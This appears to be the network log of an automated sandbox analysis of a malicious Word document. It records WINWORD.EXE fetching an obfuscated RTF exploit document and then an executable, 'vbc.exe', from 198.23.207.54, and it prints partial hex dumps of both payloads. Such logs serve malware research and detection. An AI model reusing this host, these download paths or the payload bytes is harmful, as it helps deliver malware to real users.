Aug 5, 2022 16:36:12.167733908 CEST	7	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 68 70 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 Data Ascii: PROPFIND /shp/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 198.23.207.54
Aug 5, 2022 16:36:12.307225943 CEST	8	IN	HTTP/1.1 405 Method Not Allowed Date: Fri, 05 Aug 2022 14:36:12 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Allow: GET,POST,OPTIONS,HEAD,TRACE Content-Length: 328 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 33 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6e 20 50 48 50 2f 38 2e 31 2e 36 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 32 33 2e 32 30 37 2e 35 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Server at 198.23.207.54 Port 80</address></body></html>
Aug 5, 2022 16:36:12.618189096 CEST	23	IN	HTTP/1.1 405 Method Not Allowed Date: Fri, 05 Aug 2022 14:36:12 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Allow: GET,POST,OPTIONS,HEAD,TRACE Content-Length: 328 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 33 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6e 20 50 48 50 2f 38 2e 31 2e 36 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 32 33 2e 32 30 37 2e 35 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Server at 198.23.207.54 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49174	198.23.207.54	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Aug 5, 2022 16:36:12.481197119 CEST	8	OUT	GET /shp/doc_200.doc HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 198.23.207.54 Connection: Keep-Alive
Aug 5, 2022 16:36:12.596581936 CEST	10	IN	HTTP/1.1 200 OK Date: Fri, 05 Aug 2022 14:36:12 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Last-Modified: Thu, 04 Aug 2022 12:13:37 GMT ETag: "6015-5e569478401c7" Accept-Ranges: bytes Content-Length: 24597 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword Data Raw: 7b 5c 72 74 46 36 31 33 32 5b 34 5b 40 34 5d 3f 25 37 5f 21 3f 27 31 34 31 38 60 3f 35 5b 35 21 3c 32 27 2d 60 30 3f 3f 2e 27 b5 26 b0 36 32 3f 60 21 34 25 34 2e 30 23 3a 3d 25 30 2e a7 3e 39 38 b0 2d 3d 3d 2f 36 37 27 25 35 33 2a 38 3f 31 7c 5f 3f 35 3a a7 5d 3f 2b 3f 60 21 60 2d 60 2d b0 2d 3f 40 21 a7 3f a7 29 b5 3c 3f 32 30 3f 32 3c 3f 2e 29 2c 3c 24 35 2f 60 40 36 3b 3b 7c 5b 2b 35 2b 32 7c 60 24 3c 21 3f 3f 3e 21 40 25 21 3d 3f 31 b5 27 29 31 36 24 38 27 29 5f 34 5e 29 60 5f 40 29 2a 35 2c 29 7e 28 2b 36 24 2c 39 a7 3f 31 2d 29 27 37 2b 3c 29 2e b0 2b 2c b5 2b 40 5e 38 26 31 23 40 25 23 25 38 26 24 2e 29 35 30 32 3b 32 3d 34 3f 25 5d 27 3c 29 3e 5e 34 30 3c 23 2a 37 5d 31 25 31 3f 29 37 25 26 2e 33 a7 25 7c 3a 40 31 26 b5 37 35 60 b5 3f 25 2a 5f 23 5e 37 7e a7 b0 36 3c 29 26 a7 39 a7 25 2c 2a 23 30 2b 27 27 3a 25 31 23 31 7c 3c 30 3e 37 60 26 3a 23 b0 3f 7c 23 3b 30 3e 5e 5d 2d 3d 38 3f 2a 2d 3f b5 40 b0 39 27 2d a7 24 2c 25 3c 39 3a 3f b0 3f 5d 5e 5e 2c 5b 2c 3f 32 2a 5d 39 30 b5 23 37 a7 35 21 31 b5 7c 35 5e 25 2b 2d 3e 2e 33 24 3a 21 29 34 2e 3e 33 3f 21 7e 32 3f 36 b5 3a 60 3d 7e 27 28 3f 37 40 23 3b 2c 39 5f 25 3b 2d b5 3f 3b 3e 30 3f 3f 30 2f 38 7c 3d b0 b5 3e 7c 40 3f 5b b5 30 3a 3b 3f 37 25 2a 3a 5f 39 7c 3f 2a b5 37 39 3d 23 31 b5 2a 7e 37 7c 23 23 7c 24 3f 30 3a 29 25 2e 21 28 3f 37 5b 26 5b 3e 3d 3f 3d 31 34 5e 5e 2b a7 3f 24 2f 7c 27 2b b5 3e 3c 2e 5b 3b 2b 24 39 33 a7 24 a7 40 3f 5b b0 37 2d 23 32 2e 3d 7e 34 24 2b b5 27 60 3c 25 29 27 3a 29 7e 3c 5b 28 3f 60 32 3a 39 38 23 b0 26 33 37 3d 3f 7e 3e 7e 40 2c 2e b0 39 b5 60 2d 2c 3b 2c 3e 33 34 2a b0 40 40 3f 40 2d 2a 24 3f 7e 34 5b 2e 32 3e 2b 7e 24 5f 3f 2a 5d 32 38 3f 40 40 5d 38 3f 7c 25 24 3f 3d 3f 36 24 26 3f 33 2d a7 2c 3f 2a 3b 23 2f 2b 3f 26 40 5b 35 34 3f 32 28 28 30 25 21 3f 24 37 2e 3c 21 3d 26 3a 5e 26 34 33 3e 3f 31 3f b0 25 2c 35 a7 23 3f 21 21 2e 23 34 3e 25 a7 39 b5 25 25 3a 3b b5 24 5d 5f 38 2b 29 27 39 2f 23 3f 5b 60 2a 30 5d 2f 37 2b b5 3c 7c 23 27 36 27 29 b0 2f 39 24 21 32 21 25 2d 23 23 b5 24 24 2c 3f b5 5d b5 3f 2c 2a 2b 38 2b 34 3b 7e 3f 24 5e 2d 2b 27 35 24 5b 27 38 3a b5 25 38 3e 3d 23 25 7e b0 2f 38 b0 5f 23 34 2f 3b 2e 3f 26 23 33 24 5d b0 2e 25 7e 7e 60 30 28 3f 25 33 27 33 3f 3f 24 3f 3c 40 33 40 3f 5d 2c 7e 60 b5 3f 23 33 28 2d 40 5e 60 7e 28 7e 3f b5 7c 23 34 7c 3f 3d 39 34 b0 38 2f 3f 35 7e 38 2f 24 2d 3f 3f 5d 3c 39 5f 3f 26 7e 28 25 a7 2f 3f 2d b0 40 36 3f 29 2d 3f 24 32 2c 3f 39 5b 27 3e 3f 7e 29 25 33 21 25 3f 24 3f 2b 7e 39 7e b5 36 3f 2e 28 21 25 5d 3a 24 31 39 5f 60 5d 5b 3f 2a 27 36 3b 33 3f 32 7c 3c 2c 7c 2f 38 a7 5e 29 39 3f 3f 2b 38 3f 3f 3e 31 7e 3f 3e b0 7e 3f 5b 7c 2e 23 31 3f 25 3f 23 35 35 28 3a 34 5f 24 3f 3f 25 37 40 b0 5b 36 23 29 5f 32 5b 39 3e 35 28 3f 7c 5b 7e 3a a7 3f 2c 2e 3f 23 29 3e 2c 35 7e 29 3f 60 3f 3e 40 2a b5 25 23 33 35 2e 31 29 5b 2f 32 33 3a 2c 24 3f 25 40 5f 60 3f 25 5e 7c 60 5e b5 24 35 40 b5 5b 37 32 3d 7c 5d 5f 26 2e 3d 21 2b 25 3a 35 21 24 5d 37 5b 38 2e 23 3f 3f 3c 23 21 25 32 25 32 3c 3f 3f 39 5f 34 2b 3b 3a 5b 2c 28 2a 2b 23 23 40 39 2b 25 2a 33 29 29 38 Data Ascii: {\rtF6132[4[@4]?%7_!?'1418`?5[5!<2'-`0??.'&62?`!4%4.0#:=%0.>98-==/67'%538?1\|_?5:]?+?`!`-`--?@!?)<?20?2<?.),<$5/`@6;;\|[+5+2\|`$<!??>!@%!=?1')16$8')_4^)`_@)5,)~(+6$,9?1-)'7+<).+,+@^8&1#@%#%8&$.)502;2=4?%]'<)>^40<#7]1%1?)7%&.3%\|:@1&75`?%_#^7~6<)&9%,#0+'':%1#1\|<0>7`&:#?\|#;0>^]-=8?-?@9'-$,%<9:??]^^,[,?2]90#75!1\|5^%+->.3$:!)4.>3?!~2?6:`=~'(?7@#;,9_%;-?;>0??0/8\|=>\|@?[0:;?7%:_9\|?79=#1~7\|##\|$?0:)%.!(?7[&[>=?=14^^+?$/\|'+><.[;+$93$@?[7-#2.=~4$+'`<%)':)~<[(?`2:98#&37=?~>~@,.9`-,;,>34@@?@-$?~4[.2>+~$_?]28?@@]8?\|%$?=?6$&?3-,?;#/+?&@[54?2((0%!?$7.<!=&:^&43>?1?%,5#?!!.#4>%9%%:;$]_8+)'9/#?[`0]/7+<\|#'6')/9$!2!%-##$$,?]?,+8+4;~?$^-+'5$['8:%8>=#%~/8_#4/;.?&#3$].%~~`0(?%3'3??$?<@3@?],~`?#3(-@^`~(~?\|#4\|?=948/?5~8/$-??]<9_?&~(%/?-@6?)-?$2,?9['>?~)%3!%?$?+~9~6?.(!%]:$19_`][?'6;3?2\|<,\|/8^)9??+8??>1~?>~?[\|.#1?%?#55(:4_$??%7@[6#)_2[9>5(?\|[~:?,.?#)>,5~)?`?>@%#35.1)[/23:,$?%@_`?%^\|`^$5@[72=\|]_&.=!+%:5!$]7[8.#??<#!%2%2<??9_4+;:[,(+##@9+%3))8
Aug 5, 2022 16:36:12.596610069 CEST	11	IN	Data Raw: 24 2d b0 3f 2b 3f a7 37 7c 35 28 b5 a7 21 2c 32 26 5b a7 30 37 38 2a 3e 2b 23 3f 2a 25 3f 3f 26 2f 3b 38 3f 35 5b 32 3f 31 38 7c 5e 39 3c 3e 30 33 2d 60 3f a7 23 24 b0 b0 2a 3f 5d 7c 34 32 3f 40 3c 2d 21 3f 30 5b 7e 39 35 a7 37 36 5f 40 39 25 3f Data Ascii: $-?+?7\|5(!,2&[078>+#?%??&/;8?5[2?18\|^9<>03-`?#$?]\|42?@<-!?0[~9576_@9%?[-'^???#><~>_/>%.31#_=\|+4?=,/5[7@)?+70='~9%.~%1[%%#=>?.])?6~?.'147^.+.\|=;[^<$1)&?=-)`&62-~2.^]?18,6+_207>)+?]#?\|?`~`,5?$<1/;+`,(<?,<`?%$^5~\|>-~_2;)95#0&
Aug 5, 2022 16:36:12.596620083 CEST	12	IN	Data Raw: 3f 33 3f 3f 34 40 27 3f 25 3a 3f 35 33 3e 40 28 39 25 3a 2a 2e 2a 5f 3f 27 39 3c 3b 3a b0 27 3f 60 3f 5b 26 27 23 3f 3c 3c 2a 38 60 27 26 28 37 b0 29 3f 7c 3f 3f 31 28 30 37 3a 26 3e 5f 60 60 2c 24 3c 3f 27 25 3b 5d 3b 3f 5d 37 3f 3a 3f 5f 7c 28 Data Ascii: ?3??4@'?%:?53>@(9%:._?'9<;:'?`?[&'#?<<8`'&(7)?\|??1(07:&>_``,$<?'%;];?]7?:?_\|(_?](3/?._7-__1]~1]'<?;?@#??_.@!`65!`,#.<%`?1_8!9=3_??<#)%,&@1/6$];?<?\|47?!\|_~\|3.)!$@^1,+37\|2.?;2[,(9(9\|(5_>@?)!;!/%6375)1.2$576>?8732%,=?*+]=\|:?\|
Aug 5, 2022 16:36:12.596632004 CEST	14	IN	Data Raw: b0 39 5f 30 2a 26 3f 25 b5 24 3f 32 3f 32 3a 5f 60 2e 3f 24 2a 7e 60 2b 21 32 b5 27 32 7e b5 38 5b 3f 24 3d 7e 32 25 2b 2f b0 3f 25 28 2d 24 23 5b 60 2a 2a 3f 26 b0 37 24 2b 34 b0 21 40 b0 3f 40 2a 3d 3f 34 3d 5f 40 2b 60 38 26 35 3f 28 3f 34 a7 Data Ascii: 9_0&?%$?2?2:_`.?$~`+!2'2~8[?$=~2%+/?%(-$#[`*?&7$+4!@?@=?4=_@+`8&5?(?4!99~?^?7%1??+2,2?\|+%?>+%92;\|([62%.?(@;!13]#?';3[#&-./-?\|^+'!/<%>??2??1<.%~.;-/]!?2#1?(4?>``=</_>?(#%;6:#.8?@?~)?%!980=.?6+.%;!~?,3>(77(%>`&)^
Aug 5, 2022 16:36:12.596643925 CEST	15	IN	Data Raw: 2a 38 27 60 3f a7 3f 30 2f 29 28 2f 3b 32 2e 29 3b 3f 7c 36 3c 7c 26 27 3d 21 38 25 3f 3f b5 2e 3f 30 2a 7e 25 2b 3e b0 2f 5f 5e 35 39 3f 30 3f 28 3f 3b 35 3e 30 7e 34 7e 40 28 3f 3f 3f 39 3f 21 3f b0 2e 7c 3e 3a 30 37 40 2c a7 31 3f 3a 3d 32 2b Data Ascii: 8'`??0/)(/;2.);?\|6<\|&'=!8%??.?0~%+>/_^59?0?(?;5>0~4~@(???9?!?.\|>:07@,1?:=2+;=-#?=3%?+85?&+1~'+<2?%%-/???$%??48/07;_<!?>8];,&9?+;;76~/60??/9?]?[.7?9?-4$0?6)](82;>%/2'%5478<[.7$0%/#?&?>3%2`?;1[3`#@0&?77(](%.^(?$%$;'08&,*+?<'8($+.~
Aug 5, 2022 16:36:12.596654892 CEST	16	IN	Data Raw: 2f 36 5b 3b 26 24 24 60 37 36 3f 7e 37 7c 2f a7 26 b0 32 32 40 3b 31 40 38 33 a7 36 5d 25 2a 3a 30 3f 3a 26 3c 32 27 2f 2e 5f 28 33 3d 3f 3f 60 3f 7c 36 29 5f 3f b5 27 33 3f 28 7e 3e 30 31 37 5f 21 39 39 3c 35 38 2f 3f 2b 28 2e 23 5b 60 3e 7c 5f Data Ascii: /6[;&$$`76?~7\|/&22@;1@836]%:0?:&<2'/._(3=??`?\|6)_?'3?(~>017_!99<58/?+(.#[`>\|_7[?[:?$6$3%&?.9@/.$!$&?4~8?`01?!!4;3=<2<~~&:&%]6??$>\|4#!_<%_56?!$$1,]=)`:%7~^7.?]&`\|=3$9['>0;?&+![%?/.1_()>`-_<%=!~859?^012+?0%~]<9;*_%.(-%$?^?@&\|;
Aug 5, 2022 16:36:12.596667051 CEST	18	IN	Data Raw: 0d 5c 6c 69 6e 65 73 74 61 72 74 32 38 33 32 35 33 39 30 38 37 34 36 37 5c 76 69 65 77 73 63 61 6c 65 38 31 37 34 33 34 31 36 33 5c 27 3f 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: \linestart2832539087467\viewscale817434163\'? {\object\SMNYEDWKJBWLRCWGTNWTFNDLWgbpebeqcrsekhqnfibrtdrvhommq068941929029428412772054837018SMNYEDWKJBWLRCWGTNWTFNDLWgbpe
Aug 5, 2022 16:36:12.596683979 CEST	19	IN	Data Raw: 0a 0d 0d 66 66 66 66 20 66 66 66 66 66 66 0d 0d 0d 66 20 66 66 0a 0d 0a 66 0d 0d 0a 66 66 20 66 0d 0d 0a 66 66 0a 0a 0d 66 20 66 0d 0a 0d 66 20 66 66 66 66 0a 0a 0d 66 0a 0a 0d 66 66 0d 0d 0d 66 66 66 66 66 0d 0d 0d 66 20 66 66 0d 0d 0d 66 0a 0a Data Ascii: ffff fffffff fffff ffff ff fffffffffffff ffffff fff fff f f ffffffffffffffffffff fffffffffffff ff ffffffffff ffff ff fffffffffffffff
Aug 5, 2022 16:36:12.596694946 CEST	21	IN	Data Raw: 66 66 0a 0a 0a 66 66 66 66 20 66 20 66 0d 0a 0a 66 0d 0a 0a 66 66 0d 0a 0a 66 66 66 0a 0a 0a 66 66 0a 0a 0a 66 66 20 66 0a 0a 0a 66 66 66 66 66 0d 0a 0a 66 66 09 66 66 66 66 66 66 0d 0a 0a 66 66 09 66 0d 0a 0a 66 09 66 0d 0a 0a 66 66 66 66 0d 0a Data Ascii: ffffff f fffffffffff fffffffffffffffffffffffffffffffffff ff fffffffffffff fdf ff ff ff eff ff fffeffffff 040 00000050000000 6000 00 0feff f ff f
Aug 5, 2022 16:36:12.596705914 CEST	22	IN	Data Raw: 0d 0a 0a 66 66 66 66 66 66 66 09 66 09 66 0d 0a 0a 66 0d 0a 0a 66 66 66 66 09 66 66 66 66 0d 0a 0a 66 66 66 09 66 66 0d 0a 0a 66 66 09 66 66 0d 0a 0a 66 66 66 0d 0a 0a 66 09 66 0a 0a 0d 66 09 66 66 66 0d 0a 0d 66 66 0a 0a 0d 66 09 66 66 66 66 66 Data Ascii: fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff fff fff fff f f f ff ff fffffffff fff ffff ff f fff ff ffffffffff f
Aug 5, 2022 16:36:12.710247040 CEST	24	IN	Data Raw: 30 30 30 09 30 30 09 38 09 30 0d 0a 0a 30 09 30 30 30 30 0d 0a 0a 30 0a 0d 0d 30 0a 0a 0d 30 30 30 0a 0a 0d 30 0a 0d 0a 30 31 30 30 20 34 0d 0d 0a 66 0a 0d 0a 30 30 36 63 0a 0d 0a 30 30 36 09 35 30 30 0d 0d 0a 33 20 31 30 30 33 20 30 0d 0a 0a 30 Data Ascii: 0000080000000000000100 4f006c0065003 1003 00 0 6e00 41 0 054 00490076004 5 00000000000000000000000000000000000000000000000000000
Aug 5, 2022 16:36:13.094441891 CEST	35	OUT	HEAD /shp/doc_200.doc HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: 198.23.207.54 Content-Length: 0 Connection: Keep-Alive
Aug 5, 2022 16:36:13.209595919 CEST	35	IN	HTTP/1.1 200 OK Date: Fri, 05 Aug 2022 14:36:13 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Last-Modified: Thu, 04 Aug 2022 12:13:37 GMT ETag: "6015-5e569478401c7" Accept-Ranges: bytes Content-Length: 24597 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/msword

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49175	198.23.207.54	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Aug 5, 2022 16:36:14.833739042 CEST	36	OUT	GET /200/vbc.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 198.23.207.54 Connection: Keep-Alive
Aug 5, 2022 16:36:14.950196981 CEST	37	IN	HTTP/1.1 200 OK Date: Fri, 05 Aug 2022 14:36:14 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Last-Modified: Tue, 19 Jul 2022 05:10:31 GMT ETag: "cd000-5e42180eec4e9" Accept-Ranges: bytes Content-Length: 839680 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f 5d 9e ba 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 c8 0c 00 00 06 00 00 00 00 00 00 9a e6 0c 00 00 20 00 00 00 00 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 48 e6 0c 00 4f 00 00 00 00 00 0d 00 d8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 0c 00 00 00 2c e6 0c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 c6 0c 00 00 20 00 00 00 c8 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 03 00 00 00 00 0d 00 00 04 00 00 00 ca 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0d 00 00 02 00 00 00 ce 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c e6 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 70 5c 00 00 c4 58 00 00 03 00 00 00 37 00 00 06 34 b5 00 00 f8 30 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 02 14 7d 01 00 00 04 02 28 15 00 00 0a 00 00 02 28 09 00 00 06 00 2a 1b 30 03 00 d1 00 00 00 01 00 00 11 00 03 8c 01 00 00 1b 14 fe 03 0a 06 39 bf 00 00 00 00 02 7b 02 00 00 04 6f 16 00 00 0a 6f 17 00 00 0a 73 18 00 00 0a 0b 00 02 7b 02 00 00 04 6f 16 00 00 0a 6f 19 00 00 0a 0c 2b 5d 08 6f 1a 00 00 0a 74 16 00 00 01 0d 00 0f 01 fe 16 01 00 00 1b 6f 1b 00 00 0a 09 6f 1c 00 00 0a 6f 1d 00 00 0a 6f 1e 00 00 0a 13 04 11 04 14 28 1f 00 00 0a 13 06 11 06 2c 14 00 11 04 03 8c 01 00 00 1b 14 6f 20 00 00 0a 13 05 00 2b 05 00 14 13 05 00 07 11 05 6f 21 00 00 0a 00 00 08 6f 22 00 00 0a 2d 9b de 15 08 75 18 00 00 01 13 07 11 07 2c 08 11 07 6f 23 00 00 0a 00 dc 02 7b 02 00 00 04 6f 24 00 00 0a 07 6f 25 00 00 0a 6f 26 00 00 0a 26 00 2a 00 00 00 01 10 00 00 02 00 3a 00 69 a3 00 15 00 00 00 00 13 30 02 00 32 00 00 00 02 00 00 11 00 02 7b 02 00 00 04 6f 27 00 00 0a 6f 17 00 00 0a 16 30 03 15 2b 16 02 7b 02 00 00 04 6f 27 00 00 0a 16 6f 28 00 00 0a 6f 29 00 00 0a 0a 2b 00 06 2a 00 00 13 30 02 00 3a 00 00 00 03 00 00 11 00 03 15 31 15 03 02 7b 02 00 00 04 6f 24 00 00 0a 6f 2a 00 00 0a fe 04 2b 01 16 0a 06 2c 1a 00 02 7b 02 00 00 04 6f 24 00 00 0a 03 6f 2b 00 00 0a 17 6f 2c 00 00 0a 00 00 2a 00 00 1b 30 03 00 a2 00 00 00 04 00 00 11 00 00 02 7b 02 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_]0 @ @@HO , H.text `.rsrc@@.reloc @B\|Hp\X740^}((09{oos{oo+]otoooo(,o +o!o"-u,o#{o$o%o&&:i02{o'o0+{o'o(o)+0:1{o$o+,{o$o+o,*0{
Aug 5, 2022 16:36:14.950225115 CEST	39	IN	Data Raw: 00 00 04 6f 16 00 00 0a 6f 2d 00 00 0a 00 00 03 6f 2e 00 00 0a 0a 2b 69 12 00 28 2f 00 00 0a 0b 00 02 7b 02 00 00 04 6f 16 00 00 0a 07 6f 20 00 00 06 07 6f 1a 00 00 06 6f 30 00 00 0a 0c 02 7b 02 00 00 04 6f 16 00 00 0a 08 6f 31 00 00 0a 07 6f 1e Data Ascii: oo-o.+i(/{oo oo0{oo1oo2{oo1o(3o4(5-o#vN{o$o60{o'o9(+
Aug 5, 2022 16:36:14.950258017 CEST	40	IN	Data Raw: 47 00 02 7b 06 00 00 04 6f 5e 00 00 0a 28 4f 00 00 0a 0d 09 2c 07 00 73 5f 00 00 0a 7a 02 7b 06 00 00 04 6f 5e 00 00 0a 12 02 28 60 00 00 0a 16 fe 01 13 04 11 04 2c 07 00 73 61 00 00 0a 7a 12 00 08 28 62 00 00 0a 00 06 13 05 2b 00 11 05 2a 00 13 Data Ascii: G{o^(O,s_z{o^(`,saz(b+0@(c,{(d(eof{(cog0+,{+,{o#(:*0Psh}si
Aug 5, 2022 16:36:14.950273037 CEST	41	IN	Data Raw: 0a 02 7b 0f 00 00 04 6f 4c 00 00 0a 00 02 28 4b 00 00 0a 02 7b 0e 00 00 04 6f 4c 00 00 0a 00 02 28 4b 00 00 0a 02 7b 0d 00 00 04 6f 4c 00 00 0a 00 02 72 97 01 00 70 28 41 00 00 0a 00 02 72 97 01 00 70 6f 66 00 00 0a 00 02 16 28 4e 00 00 0a 00 2a Data Ascii: {oL(K{oL(K{oLrp(Arpof(N0cs6}%rp%rp%rp}}(n(~t{(r&(**0ss%rpotou,z{
Aug 5, 2022 16:36:14.950289011 CEST	43	IN	Data Raw: 00 0a 6f 8b 00 00 0a 00 02 7b 1d 00 00 04 20 17 01 00 00 1f 0c 73 3f 00 00 0a 6f 40 00 00 0a 00 02 7b 1d 00 00 04 72 e9 02 00 70 6f 41 00 00 0a 00 02 7b 1d 00 00 04 1f 69 1f 25 73 45 00 00 0a 6f 46 00 00 0a 00 02 7b 1d 00 00 04 17 6f 47 00 00 0a Data Ascii: o{ s?o@{rpoA{i%sEoF{oG{rpof{ok{(so{ s?o@{r!poA{i%sEoF{oG{rOpof{ok
